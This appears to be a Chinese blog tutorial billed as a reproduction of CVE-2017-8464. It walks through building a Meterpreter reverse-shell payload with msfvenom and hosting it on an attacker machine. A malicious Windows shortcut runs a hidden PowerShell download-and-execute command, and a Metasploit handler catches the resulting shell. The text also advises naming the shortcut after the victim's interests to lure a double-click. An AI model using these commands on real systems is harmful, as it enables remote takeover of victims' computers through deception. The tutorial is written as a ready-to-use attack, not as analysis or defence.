CVE-2017-8464快捷方式代码执行复现

给你一个快捷方式,你双击了,你就被可黑了。

关于漏洞的复现,github有py脚本:(本次实验不需要)

https://github.com/nixawk/labs/tree/master/CVE-2017-8464

攻击机:kali  192.168.0.111

第一步,创建metasploit payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=1337 -f psh-reflection > xx.ps1

第二步,将payload放置在web上

第三步,创建有毒的快捷方式

鼠标右键,选择新建,选择快捷方式,在请输入对象的位置这一栏,填写以下信息,注意请填写你自己的服务器文件存在位置:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.111/xx.ps1');xx.ps1"

快捷方式名字随便起,建议根据被实施攻击的用户癖好取名字,让对方有双击的欲望:

至此我们生成了一个叫做love的快捷方式

第四步,服务器开始监听

msf > use exploit/multi/handler
msf exploit(handler)> set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.111
msf exploit(handler) > set LPORT 1337
msf exploit(handler) > exploit

第五步,快捷方式攻击

在受害用户电脑上,双击此快捷方式

发表评论

电子邮件地址不会被公开。 必填项已用*标注